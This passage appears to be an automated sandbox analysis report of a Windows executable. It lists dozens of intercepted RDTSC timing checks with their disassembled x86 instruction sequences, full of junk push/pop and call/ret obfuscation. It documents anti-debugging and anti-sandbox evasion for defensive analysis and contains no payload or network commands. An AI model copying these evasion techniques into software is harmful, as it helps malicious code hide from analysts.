                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDA2EC second address: FDA32E instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4B9132D69Ch 0x00000008 jns 00007F4B9132D696h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 or di, 26A2h 0x00000018 push 00000000h 0x0000001a jmp 00007F4B9132D69Ch 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jbe 00007F4B9132D696h 0x00000029 jmp 00007F4B9132D6A1h 0x0000002e popad 0x0000002f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB30A second address: FDB310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDB310 second address: FDB315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD94B6 second address: FD94BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD94BA second address: FD9556 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jnl 00007F4B9132D6A0h 0x0000000f nop 0x00000010 jmp 00007F4B9132D6A7h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+122D28FCh] 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F4B9132D698h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 mov bx, di 0x00000046 mov eax, dword ptr [ebp+122D04C9h] 0x0000004c mov bl, cl 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edx 0x00000053 call 00007F4B9132D698h 0x00000058 pop edx 0x00000059 mov dword ptr [esp+04h], edx 0x0000005d add dword ptr [esp+04h], 0000001Bh 0x00000065 inc edx 0x00000066 push edx 0x00000067 ret 0x00000068 pop edx 0x00000069 ret 0x0000006a push eax 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f popad 0x00000070 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC1FE second address: FDC265 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6228h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4B90BE6228h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ch 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ebp 0x0000002e call 00007F4B90BE6228h 0x00000033 pop ebp 0x00000034 mov dword ptr [esp+04h], ebp 0x00000038 add dword ptr [esp+04h], 00000014h 0x00000040 inc ebp 0x00000041 push ebp 0x00000042 ret 0x00000043 pop ebp 0x00000044 ret 0x00000045 jmp 00007F4B90BE622Ch 0x0000004a push 00000000h 0x0000004c mov di, ax 0x0000004f push eax 0x00000050 push ecx 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD296 second address: FDD315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A2h 0x0000000f pushad 0x00000010 jg 00007F4B9132D696h 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b call 00007F4B9132D6A3h 0x00000020 push edi 0x00000021 pop edi 0x00000022 pop edi 0x00000023 push 00000000h 0x00000025 movzx edi, si 0x00000028 push 00000000h 0x0000002a call 00007F4B9132D6A9h 0x0000002f jmp 00007F4B9132D6A1h 0x00000034 pop edi 0x00000035 mov di, si 0x00000038 push eax 0x00000039 jg 00007F4B9132D6A0h 0x0000003f pushad 0x00000040 push edx 0x00000041 pop edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDC3CA second address: FDC3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4B90BE6226h 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE37D second address: FDE3F8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F4B9132D698h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 00000015h 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D3526h] 0x0000002c push 00000000h 0x0000002e mov edi, 607ABBACh 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edi 0x00000038 call 00007F4B9132D698h 0x0000003d pop edi 0x0000003e mov dword ptr [esp+04h], edi 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edi 0x0000004b push edi 0x0000004c ret 0x0000004d pop edi 0x0000004e ret 0x0000004f mov bx, 8622h 0x00000053 xchg eax, esi 0x00000054 jg 00007F4B9132D6A4h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F4B9132D69Bh 0x00000062 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD466 second address: FDD46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD53E second address: FDD542 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD542 second address: FDD550 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4B90BE622Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDD550 second address: FDD566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 jmp 00007F4B9132D69Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE5FD second address: FDE60F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 je 00007F4B90BE6234h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDE60F second address: FDE613 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF43A second address: FDF451 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4B90BE6228h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007F4B90BE6238h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF451 second address: FDF455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF455 second address: FDF51A instructions: 0x00000000 rdtsc 0x00000002 js 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jo 00007F4B90BE622Bh 0x00000011 mov ebx, 6300E352h 0x00000016 mov dword ptr [ebp+122D1DD8h], ebx 0x0000001c push dword ptr fs:[00000000h] 0x00000023 mov edi, 0B0CE6FCh 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F4B90BE6228h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 mov eax, dword ptr [ebp+122D09A1h] 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F4B90BE6228h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 jmp 00007F4B90BE622Ah 0x0000006e push FFFFFFFFh 0x00000070 jmp 00007F4B90BE6238h 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 pushad 0x00000079 jmp 00007F4B90BE6237h 0x0000007e jl 00007F4B90BE6226h 0x00000084 popad 0x00000085 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FDF51A second address: FDF524 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4B9132D69Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE046D second address: FE0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0471 second address: FE0477 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0477 second address: FE047D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE047D second address: FE0481 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE0481 second address: FE0485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE9150 second address: FE9161 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE92E8 second address: FE92ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE948E second address: FE94CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A7h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4B9132D6A7h 0x00000010 pushad 0x00000011 jmp 00007F4B9132D69Ah 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FE94CF second address: FE94D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEEFEC second address: FEF013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007F4B9132D6A4h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF013 second address: FEF019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF019 second address: FEF028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF028 second address: FEF02E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF02E second address: FEF061 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D6A0h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F4B9132D6A1h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF061 second address: FEF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FEF0CE second address: FEF0E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 popad 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5F36 second address: FF5F4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5F4D second address: FF5F5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F4B9132D69Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4B18 second address: FF4B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF4B1C second address: FF4B20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF52AE second address: FF52D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F4B90BE6226h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE6234h 0x00000012 jns 00007F4B90BE6228h 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF52D7 second address: FF52FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B9132D69Ch 0x00000008 jmp 00007F4B9132D6A7h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF52FF second address: FF5321 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4B90BE6238h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5473 second address: FF5485 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007F4B9132D69Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF55CE second address: FF55D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF55D2 second address: FF55DC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4B9132D696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF55DC second address: FF55EC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4B90BE6232h 0x00000008 je 00007F4B90BE6226h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF58A8 second address: FF58C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF58C0 second address: FF58E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B90BE622Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F4B90BE622Fh 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF58E4 second address: FF5912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A4h 0x00000007 je 00007F4B9132D696h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F4B9132D696h 0x00000019 jc 00007F4B9132D696h 0x0000001f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5D7B second address: FF5D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FF5D81 second address: FF5DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F4B9132D69Eh 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 jmp 00007F4B9132D6A1h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b pop eax 0x0000001c jmp 00007F4B9132D6A2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC749 second address: FFC74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC74D second address: FFC751 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC751 second address: FFC765 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4B90BE622Bh 0x0000000e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FFC765 second address: FFC76D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7EC40 second address: F7EC4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000B69 second address: 1000B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1000B70 second address: 1000B85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100114E second address: 1001152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001586 second address: 100158E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100158E second address: 10015AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jmp 00007F4B9132D69Ah 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001728 second address: 100172D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 100172D second address: 1001733 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001733 second address: 1001737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001737 second address: 100177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F4B9132D6BCh 0x0000000c jmp 00007F4B9132D6A3h 0x00000011 jmp 00007F4B9132D6A3h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 pop ecx 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001BE4 second address: 1001BEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001BEA second address: 1001BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1001BEE second address: 1001C0E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F4B90BE6226h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edx 0x0000000c pop edx 0x0000000d jo 00007F4B90BE6226h 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 jg 00007F4B90BE623Dh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10034A5 second address: 10034AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8717C second address: F871A5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007F4B90BE6226h 0x00000009 pushad 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007F4B90BE6239h 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10068F0 second address: 1006906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop esi 0x0000000a pushad 0x0000000b js 00007F4B9132D698h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC24D6 second address: FC2508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jl 00007F4B90BE6232h 0x0000000c jne 00007F4B90BE622Ch 0x00000012 nop 0x00000013 mov ecx, dword ptr [ebp+122D2C44h] 0x00000019 lea eax, dword ptr [ebp+1248727Ah] 0x0000001f mov ecx, dword ptr [ebp+122D2BC8h] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2508 second address: FC250C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC250C second address: FC2512 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2512 second address: FAB3B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F4B9132D698h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov ecx, dword ptr [ebp+122D2A7Ch] 0x0000002c mov edx, dword ptr [ebp+122D33B5h] 0x00000032 call dword ptr [ebp+122D334Eh] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC2CCA second address: FC2CFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6230h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE6239h 0x00000011 rdtsc
